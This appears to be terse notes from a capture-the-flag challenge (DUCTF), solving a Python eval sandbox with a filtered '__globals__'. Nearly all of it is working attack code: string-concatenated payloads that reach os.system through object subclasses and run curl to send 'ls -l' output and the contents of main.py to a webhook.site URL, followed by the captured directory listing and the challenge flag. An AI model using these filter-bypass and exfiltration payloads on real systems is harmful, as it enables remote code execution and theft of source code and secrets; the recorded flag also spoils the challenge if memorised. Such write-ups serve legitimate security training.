("a")

__globals__ is filtered

eval("\"\".__class__.__mro__[1].__subclasses__()[132].__init__"+".__glob"+"als__"+"[\"system\"]"+"('curl https://webhook.site/1259045f-076d-49d7-9435-e1d8058799fd --data \"c=$(ls -l)\"')")

c=total 20
drwxr-xr-x 2 root root 4096 Sep 19 02:22 __pycache__
-rw-r--r-- 1 root root 1371 Sep  9 07:18 main.py
-rw-r--r-- 1 root root  202 Aug 16 16:49 prestart.sh
drwxr-xr-x 2 root root 4096 Sep 13 05:41 templates
-rw-r--r-- 1 root root   37 Aug 16 16:49 uwsgi.ini

eval("\"\".__class__.__mro__[1].__subclasses__()[132].__init__"+".__glob"+"als__"+"[\"system\"]"+"('curl https://webhook.site/1259045f-076d-49d7-9435-e1d8058799fd --data \"c=$(cat main.py)\"')")

# Get flag, in main.py
DUCTF{3v4L_1s_D4ng3r0u5}